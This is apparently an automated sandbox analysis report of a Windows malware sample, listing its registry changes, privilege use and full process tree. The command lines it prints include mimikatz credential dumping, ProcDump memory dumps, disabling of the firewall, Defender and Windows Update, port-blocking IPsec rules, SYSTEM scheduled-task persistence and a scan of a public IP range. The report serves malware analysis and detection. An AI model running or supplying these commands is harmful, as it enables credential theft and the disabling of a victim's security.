Providers\Software Publishing wufpycp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wufpycp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ wufpycp.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2720 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3724 schtasks.exe 1584 schtasks.exe 2036 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1072 2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 1072 2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1764 wufpycp.exe Token: SeDebugPrivilege 2072 wufpycp.exe Token: SeDebugPrivilege 1436 vfshost.exe Token: SeDebugPrivilege 1220 cbfrbbacp.exe Token: SeLockMemoryPrivilege 4812 qfkbee.exe Token: SeLockMemoryPrivilege 4812 qfkbee.exe Token: SeDebugPrivilege 1828 cbfrbbacp.exe Token: SeDebugPrivilege 1456 cbfrbbacp.exe Token: SeDebugPrivilege 4972 cbfrbbacp.exe Token: SeDebugPrivilege 4352 cbfrbbacp.exe Token: SeDebugPrivilege 4220 cbfrbbacp.exe Token: SeDebugPrivilege 3880 cbfrbbacp.exe Token: SeDebugPrivilege 4092 cbfrbbacp.exe Token: SeDebugPrivilege 3180 cbfrbbacp.exe Token: SeDebugPrivilege 1384 cbfrbbacp.exe Token: SeDebugPrivilege 1016 cbfrbbacp.exe Token: SeDebugPrivilege 1492 cbfrbbacp.exe Token: SeDebugPrivilege 2908 cbfrbbacp.exe Token: SeDebugPrivilege 5044 cbfrbbacp.exe Token: SeDebugPrivilege 3964 cbfrbbacp.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1072 2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe 1072 2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe 1764 wufpycp.exe 1764 wufpycp.exe 2072 wufpycp.exe 2072 wufpycp.exe 2100 xohudmc.exe 2624 ogiqci.exe 4608 wufpycp.exe 4608 wufpycp.exe 2120 wufpycp.exe 2120 wufpycp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1072 wrote to memory of 1492 1072 2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe 84 PID 1072 wrote to memory of 1492 1072 2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe 84 PID 1072 wrote to memory of 1492 1072 2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe 84 PID 1492 wrote to memory of 2720 1492 cmd.exe 86 PID 1492 wrote to memory of 2720 1492 cmd.exe 86 PID 1492 wrote to memory of 2720 1492 cmd.exe 86 PID 1492 wrote to memory of 1764 1492 cmd.exe 87 PID 1492 wrote to memory of 1764 1492 cmd.exe 87 PID 1492 wrote to memory of 1764 1492 cmd.exe 87 PID 2072 wrote to memory of 3468 2072 wufpycp.exe 89 PID 2072 wrote to memory of 3468 2072 wufpycp.exe 89 PID 2072 wrote to memory of 3468 2072 wufpycp.exe 89 PID 3468 wrote to memory of 448 3468 cmd.exe 91 PID 3468 wrote to memory of 448 3468 cmd.exe 91 PID 3468 wrote to memory of 448 3468 cmd.exe 91 PID 3468 wrote to memory of 744 3468 cmd.exe 92 PID 3468 wrote to memory of 744 3468 cmd.exe 92 PID 3468 wrote to memory of 744 3468 cmd.exe 92 PID 3468 wrote to memory of 1436 3468 cmd.exe 93 PID 3468 wrote to memory of 1436 3468 cmd.exe 93 PID 3468 wrote to memory of 1436 3468 cmd.exe 93 PID 3468 wrote to memory of 2240 3468 cmd.exe 94 PID 3468 wrote to memory of 2240 3468 cmd.exe 94 PID 3468 wrote to memory of 2240 3468 cmd.exe 94 PID 3468 wrote to memory of 2120 3468 cmd.exe 95 PID 3468 wrote to memory of 2120 3468 cmd.exe 95 PID 3468 wrote to memory of 2120 3468 cmd.exe 95 PID 3468 wrote to memory of 4820 3468 cmd.exe 96 PID 3468 wrote to memory of 4820 3468 cmd.exe 96 PID 3468 wrote to memory of 4820 3468 cmd.exe 96 PID 2072 wrote to memory of 4312 2072 wufpycp.exe 97 PID 2072 wrote to memory of 4312 2072 wufpycp.exe 97 PID 2072 wrote to memory of 4312 2072 wufpycp.exe 97 PID 2072 wrote to memory of 1512 2072 wufpycp.exe 99 PID 2072 wrote to memory of 1512 2072 wufpycp.exe 99 PID 2072 wrote to memory of 1512 2072 wufpycp.exe 99 PID 2072 wrote to memory of 3452 2072 wufpycp.exe 101 PID 2072 wrote to memory of 3452 2072 wufpycp.exe 101 PID 2072 wrote to memory of 3452 2072 wufpycp.exe 101 PID 2072 wrote to memory of 3636 2072 wufpycp.exe 103 PID 2072 wrote to memory of 3636 2072 wufpycp.exe 103 PID 2072 wrote to memory of 3636 2072 wufpycp.exe 103 PID 3636 wrote to memory of 1652 3636 cmd.exe 105 PID 3636 wrote to memory of 1652 3636 cmd.exe 105 PID 3636 wrote to memory of 1652 3636 cmd.exe 105 PID 1652 wrote to memory of 3096 1652 wpcap.exe 106 PID 1652 wrote to memory of 3096 1652 wpcap.exe 106 PID 1652 wrote to memory of 3096 1652 wpcap.exe 106 PID 3096 wrote to memory of 3488 3096 net.exe 108 PID 3096 wrote to memory of 3488 3096 net.exe 108 PID 3096 wrote to memory of 3488 3096 net.exe 108 PID 1652 wrote to memory of 1940 1652 wpcap.exe 109 PID 1652 wrote to memory of 1940 1652 wpcap.exe 109 PID 1652 wrote to memory of 1940 1652 wpcap.exe 109 PID 1940 wrote to memory of 2756 1940 net.exe 111 PID 1940 wrote to memory of 2756 1940 net.exe 111 PID 1940 wrote to memory of 2756 1940 net.exe 111 PID 1652 wrote to memory of 3508 1652 wpcap.exe 112 PID 1652 wrote to memory of 3508 1652 wpcap.exe 112 PID 1652 wrote to memory of 3508 1652 wpcap.exe 112 PID 3508 wrote to memory of 2128 3508 net.exe 114 PID 3508 wrote to memory of 2128 3508 net.exe 114 PID 3508 wrote to memory of 2128 3508 net.exe 114 PID 1652 wrote to memory of 3028 1652 wpcap.exe 115
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1688
-
C:\Windows\TEMP\rcniikecz\qfkbee.exe"C:\Windows\TEMP\rcniikecz\qfkbee.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Users\Admin\AppData\Local\Temp\2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\qwfeikpz\wufpycp.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2720
-
-
C:\Windows\qwfeikpz\wufpycp.exeC:\Windows\qwfeikpz\wufpycp.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1764
-
-
-
C:\Windows\qwfeikpz\wufpycp.exeC:\Windows\qwfeikpz\wufpycp.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:448
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1436
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2120
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:4820
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4312
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1512
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3452
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\grcbdiffb\bbccvkzri\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\grcbdiffb\bbccvkzri\wpcap.exeC:\Windows\grcbdiffb\bbccvkzri\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:3488
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2756
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2128
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:3028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:2540
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3144
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3912
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2804
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4040
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2204
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\grcbdiffb\bbccvkzri\fwecknipu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\grcbdiffb\bbccvkzri\Scant.txt2⤵PID:2824
-
C:\Windows\grcbdiffb\bbccvkzri\fwecknipu.exeC:\Windows\grcbdiffb\bbccvkzri\fwecknipu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\grcbdiffb\bbccvkzri\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\grcbdiffb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\grcbdiffb\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:1804 -
C:\Windows\grcbdiffb\Corporate\vfshost.exeC:\Windows\grcbdiffb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "czeybgele" /ru system /tr "cmd /c C:\Windows\ime\wufpycp.exe"2⤵PID:3608
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "czeybgele" /ru system /tr "cmd /c C:\Windows\ime\wufpycp.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gwfpzaezv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qwfeikpz\wufpycp.exe /p everyone:F"2⤵PID:2624
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gwfpzaezv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qwfeikpz\wufpycp.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zbaheirbu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rcniikecz\qfkbee.exe /p everyone:F"2⤵PID:3248
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zbaheirbu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rcniikecz\qfkbee.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2036
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2100
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4820
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1884
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3120
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2176
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4596
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2580
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4444
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4932
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2192
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4540
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 776 C:\Windows\TEMP\grcbdiffb\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2592
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:3060
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:1384
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:2864
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:2680
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:956
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:2932
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:2460
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:4924
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:3528
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:3428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:4780
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:3496
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:1764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:3640
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:800
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:1484
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:4608
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:2124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:4268
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:4336
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:3680
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:3932
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:2100
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 332 C:\Windows\TEMP\grcbdiffb\332.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 1688 C:\Windows\TEMP\grcbdiffb\1688.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 2612 C:\Windows\TEMP\grcbdiffb\2612.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3008 C:\Windows\TEMP\grcbdiffb\3008.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4352
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3044 C:\Windows\TEMP\grcbdiffb\3044.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4220
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 772 C:\Windows\TEMP\grcbdiffb\772.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3880
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3784 C:\Windows\TEMP\grcbdiffb\3784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3872 C:\Windows\TEMP\grcbdiffb\3872.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3180
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3940 C:\Windows\TEMP\grcbdiffb\3940.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 4024 C:\Windows\TEMP\grcbdiffb\4024.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3368 C:\Windows\TEMP\grcbdiffb\3368.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3936 C:\Windows\TEMP\grcbdiffb\3936.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 2308 C:\Windows\TEMP\grcbdiffb\2308.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 2672 C:\Windows\TEMP\grcbdiffb\2672.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
